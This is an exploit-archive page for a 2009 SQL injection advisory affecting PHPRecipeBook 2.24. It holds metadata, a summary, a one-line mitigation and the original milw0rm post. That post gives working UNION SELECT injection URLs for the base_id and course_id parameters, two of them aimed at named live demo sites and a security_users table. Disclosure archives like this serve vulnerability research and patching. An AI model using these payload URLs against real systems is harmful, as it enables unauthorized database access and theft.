header-logo
Suggest Exploit
vendor:
PHPRecipeBook
by:
d3b4g
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPRecipeBook
Affected Version From: 2.24
Affected Version To: 2.24
Patch Exists: NO
Related CWE: N/A
CPE: a:phprecipebook:phprecipebook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web-based
2009

PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability

PHPRecipeBook is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to the lack of proper sanitization of user-supplied input to the 'base_id' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access to the database and execution of arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability
[-] 
[+] Discovered By d3b4g 
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/                 
[+] Greetz :  str0ke | Inerd | & friends
[-] Follow me on twitter www.twitter.com/schaba


About:
------>
PHPRecipeBook is a Web-based cookbook with the 
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited. 
The shopping list also attempts to combine similar items
so that duplication does not occur. 



/* start

0x1 

Proof of concept 
-------------------------------------

Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--


/* end

-------------------------------------
From Tiny Little island of Maldivies 
-------------------------------------

# milw0rm.com [2009-03-09]

Navigation

Suggest Exploit

Services By CQR